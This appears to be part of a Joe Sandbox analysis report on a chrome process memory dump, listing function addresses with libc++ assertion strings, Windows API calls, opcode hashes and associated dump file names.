                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at
                                                    • API String ID: 689400697-2888085009
                                                    • Opcode ID: 3f827e566a7c4d08a4bcd4d995ef1515bf2f94326d9498dc2120f3f2eebfe6ab
                                                    • Instruction ID: ebf9a66c5288aceec33dc379b20ea5dd3bc6c9a34d7c5aea875202777924f61e
                                                    • Opcode Fuzzy Hash: 3f827e566a7c4d08a4bcd4d995ef1515bf2f94326d9498dc2120f3f2eebfe6ab
                                                    • Instruction Fuzzy Hash: 3CD14A32E0C4A107DB3D463D8CA02B97AD24FC621570EC37AFCD9EABC7E52C99515694
                                                    APIs
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length, xrefs: 00D54632
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: _strlen
                                                    • String ID: ..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length
                                                    • API String ID: 4218353326-3542035028
                                                    • Opcode ID: a58568d62b5f8b39b0fbe577fc0ab65c0d38e8da0b4e827efcf38ac721dc88f1
                                                    • Instruction ID: a046ba972d12fe85ebd9a4636027831e697145f3c828020a2f78b5e71ac19ab2
                                                    • Opcode Fuzzy Hash: a58568d62b5f8b39b0fbe577fc0ab65c0d38e8da0b4e827efcf38ac721dc88f1
                                                    • Instruction Fuzzy Hash: 024194B1D003095FD704DF29A84196BB7F5EF99314B14963EF409EB342E770A9448BA1
                                                    APIs
                                                    • InitOnceExecuteOnce.KERNEL32(00F00488,00D9A780,00000000,00000000,?,00D4B992,?,?,?), ref: 00E0942D
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: Once$ExecuteInit
                                                    • String ID:
                                                    • API String ID: 689400697-0
                                                    • Opcode ID: 141e09c5882769e9f50f7317dd9220c63d79c070d4d7b65c9545ed90ad797dd7
                                                    • Instruction ID: 37359e19155ba7a458674177ac45e911751808c0887313fe3a3ac1d3dd2146f0
                                                    • Opcode Fuzzy Hash: 141e09c5882769e9f50f7317dd9220c63d79c070d4d7b65c9545ed90ad797dd7
                                                    • Instruction Fuzzy Hash: 4DF15271B110568FDF08CF6AECA067EB7A3EBC9300F5A812AD506A7395DB34A915CB50
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00DC5AE8
                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00DC5AE1
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: _strlen
                                                    • String ID: ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr
                                                    • API String ID: 4218353326-2500828650
                                                    • Opcode ID: 054285c17f8c9ccdc12217f714dd8673615695e32434ec368c0906a546e1bbd2
                                                    • Instruction ID: 97d6b121bb49671f3b0bc2df170debd56b70132aa079ac6a0e4a2ba692f2ede2
                                                    • Opcode Fuzzy Hash: 054285c17f8c9ccdc12217f714dd8673615695e32434ec368c0906a546e1bbd2
                                                    • Instruction Fuzzy Hash: FF12B571A006568FDB04CF54D880B6A7BB2BF84314F29865DD8569B399D731FD82CBA0
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\vector:1411: assertion __n < size() failed: vector[] index out of bounds, xrefs: 00DB92B3
                                                    • ..\..\third_party\libc++\src\include\optional:800: assertion this->has_value() failed: optional operator* called on a disengaged value, xrefs: 00DB92C2
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ..\..\third_party\libc++\src\include\optional:800: assertion this->has_value() failed: optional operator* called on a disengaged value$..\..\third_party\libc++\src\include\vector:1411: assertion __n < size() failed: vector[] index out of bounds
                                                    • API String ID: 0-1100549160
                                                    • Opcode ID: 5150fc1f74bd4c2be76e7910fcb260675c69cbcc93d8f557b64ad8be57939aae
                                                    • Instruction ID: fb8f35bee7bd3db98e36137c20708cbe2fdc6508323fac079786e7961fdcef65
                                                    • Opcode Fuzzy Hash: 5150fc1f74bd4c2be76e7910fcb260675c69cbcc93d8f557b64ad8be57939aae
                                                    • Instruction Fuzzy Hash: CAD14775A08351DFC714CF18C08065AFBE2AFC8324F1A8A6DE99A6B351C771EC45CB92
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\vector:1411: assertion __n < size() failed: vector[] index out of bounds, xrefs: 00DDC328
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00DDC319
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$..\..\third_party\libc++\src\include\vector:1411: assertion __n < size() failed: vector[] index out of bounds
                                                    • API String ID: 0-112411280
                                                    • Opcode ID: c3255b8b2301fd4e5eafafc68cfa42bd69bf3789358ffbb4107ff5fe5a1e6a1d
                                                    • Instruction ID: 70a0ffdffaf83b0fd1b373d1ca218c954ee17f116661c9fd1312094cb52017ef
                                                    • Opcode Fuzzy Hash: c3255b8b2301fd4e5eafafc68cfa42bd69bf3789358ffbb4107ff5fe5a1e6a1d
                                                    • Instruction Fuzzy Hash: FAC12230E147968FC7168F39D85126AF7A1EFDA304F1AD31BE98537691E7309882CB80
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: __next_prime overflow
                                                    • API String ID: 0-822664188
                                                    • Opcode ID: 9b77ed37957879b95285664cb04040ecc7c61777b2d86cbde44901dfce31b87b
                                                    • Instruction ID: b43171e3f2bf97b00923a42881a0c3032902d10bee4cf51b392c2c96cb0f5a5a
                                                    • Opcode Fuzzy Hash: 9b77ed37957879b95285664cb04040ecc7c61777b2d86cbde44901dfce31b87b
                                                    • Instruction Fuzzy Hash: 0E224A71B0022B4B8B1CCE2D88E056EF2D3ABD8244B2EC176D90AD7755F931DD4A82A5
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00E05FA2
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at
                                                    • API String ID: 0-2888085009
                                                    • Opcode ID: 3e28ab7d673c63de7762d1de6ca7d6f3b55c5ba457c89224eb2aa0812963c6d9
                                                    • Instruction ID: d5929b36d86c50e1cc17fba2aae1088a8eedef9401b8e5394a2c5abe44555f93
                                                    • Opcode Fuzzy Hash: 3e28ab7d673c63de7762d1de6ca7d6f3b55c5ba457c89224eb2aa0812963c6d9
                                                    • Instruction Fuzzy Hash: 22628175A00605DFCB14CF14C490BEAB7B2FF44318F28856DD89AAB382D731B992CB91
                                                    APIs
                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00E4ED00,?,?,00000008,?,?,00E526ED,00000000), ref: 00E4EFD2
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExceptionRaise
                                                    • String ID:
                                                    • API String ID: 3997070919-0
                                                    • Opcode ID: 14e988d52e8e9e382178716f5429a01d49edb5b2cf1913200d745e4555726145
                                                    • Instruction ID: 2c347128737637e8f5c4b7af186fd7a5774c5d1a2e1dc9a983e21fee9e9bc6e5
                                                    • Opcode Fuzzy Hash: 14e988d52e8e9e382178716f5429a01d49edb5b2cf1913200d745e4555726145
                                                    • Instruction Fuzzy Hash: EFB15E31610608DFD719CF28D48ABA57BE0FF45368F259698E899DF3A2C335E991CB40
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\vector:1418: assertion __n < size() failed: vector[] index out of bounds, xrefs: 00E0AC35
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ..\..\third_party\libc++\src\include\vector:1418: assertion __n < size() failed: vector[] index out of bounds
                                                    • API String ID: 0-1033426729
                                                    • Opcode ID: a303b4afee6b903a2b4f11902852cc3bb2bcd06edca7f5c32c57811d9108c3ad
                                                    • Instruction ID: 6a31359e65a478cd3c96be5d5abaf5777e7995aaf0054a5d7d6840db17af7671
                                                    • Opcode Fuzzy Hash: a303b4afee6b903a2b4f11902852cc3bb2bcd06edca7f5c32c57811d9108c3ad
                                                    • Instruction Fuzzy Hash: 0EC1A331B0031D8FDB38DE6884C456DB3A2AB88315B2FA67ED5657B2D1D6319CC2C693
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\vector:1411: assertion __n < size() failed: vector[] index out of bounds, xrefs: 00DFC755
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ..\..\third_party\libc++\src\include\vector:1411: assertion __n < size() failed: vector[] index out of bounds
                                                    • API String ID: 0-2233721302
                                                    • Opcode ID: 610b8f61b4b4d35b38d76c664cdc8465f27954566b736cfbe97aa154ce4a35e6
                                                    • Instruction ID: 56a9048e1f0ae43c1790e1503f05a20f510d1e08337f208b98d2c087c7dec096
                                                    • Opcode Fuzzy Hash: 610b8f61b4b4d35b38d76c664cdc8465f27954566b736cfbe97aa154ce4a35e6
                                                    • Instruction Fuzzy Hash: 85E10776A183199FC714DF18C180A2AB7E2BBC8320F1ADA6DE99957355C730FC45CB92
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\vector:1411: assertion __n < size() failed: vector[] index out of bounds, xrefs: 00DB6C73
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ..\..\third_party\libc++\src\include\vector:1411: assertion __n < size() failed: vector[] index out of bounds
                                                    • API String ID: 0-2233721302
                                                    • Opcode ID: 0b12cdbdca3be37aadd8f9bbf53a501031fc808ad1a3551d1e93c8a7eb05178b
                                                    • Instruction ID: 3ef5904013b035350b1352bb92c4a18a771b061a9450e799f111a5d7ef36a0f6
                                                    • Opcode Fuzzy Hash: 0b12cdbdca3be37aadd8f9bbf53a501031fc808ad1a3551d1e93c8a7eb05178b
                                                    • Instruction Fuzzy Hash: 54D1D475600B01CFC724CF29C580A56BBF2FF98310B698A6DD89A8BB65D774F845CB90
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\vector:1411: assertion __n < size() failed: vector[] index out of bounds, xrefs: 00DF5DF2
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ..\..\third_party\libc++\src\include\vector:1411: assertion __n < size() failed: vector[] index out of bounds
                                                    • API String ID: 0-2233721302
                                                    • Opcode ID: c17530d94b803ffe8311c1b7ac237a817f65a64d2ef1beed6c75eb677537803f
                                                    • Instruction ID: ce447e56262db9710d3d9b24d6561a11c3abe7cfc4f2549d88032269b45915c8
                                                    • Opcode Fuzzy Hash: c17530d94b803ffe8311c1b7ac237a817f65a64d2ef1beed6c75eb677537803f
                                                    • Instruction Fuzzy Hash: BDD13776A087159FC714CF18C48062ABBE1FF88320F1AC95DEA99AB315D370EC41CB92
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\optional:785: assertion this->has_value() failed: optional operator-> called on a disengaged value, xrefs: 00DB8C6A
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ..\..\third_party\libc++\src\include\optional:785: assertion this->has_value() failed: optional operator-> called on a disengaged value
                                                    • API String ID: 0-3475978879
                                                    • Opcode ID: f93c29e4a2ba9875f061b2d1c75fd1d956cee7349675a134035e9e4ee089c086
                                                    • Instruction ID: a623e480d1638ecb2ae8ffeda377df5426fc12ce67b5f14b9597c4fc5a6a221b
                                                    • Opcode Fuzzy Hash: f93c29e4a2ba9875f061b2d1c75fd1d956cee7349675a134035e9e4ee089c086
                                                    • Instruction Fuzzy Hash: A2A11774608341DFC718CF29C0909AABBE6BFD8344F14892EE59757761CB30E985DB62
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @
                                                    • API String ID: 0-2221463139
                                                    • Opcode ID: 0461ff951b208bbecce0a93c254a18c3957abf9619e816c6407a41dbe9aac2ae
                                                    • Instruction ID: 3e7348e849ab4aa62f9ba98801fd37c4dba379b9d30a972d16db1d0f1cc5d14b
                                                    • Opcode Fuzzy Hash: 0461ff951b208bbecce0a93c254a18c3957abf9619e816c6407a41dbe9aac2ae
                                                    • Instruction Fuzzy Hash: DC412A76B052168FCF18CE2CD4901BAFBA3FF96711B1D806DD899AB315DA319C4693B0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
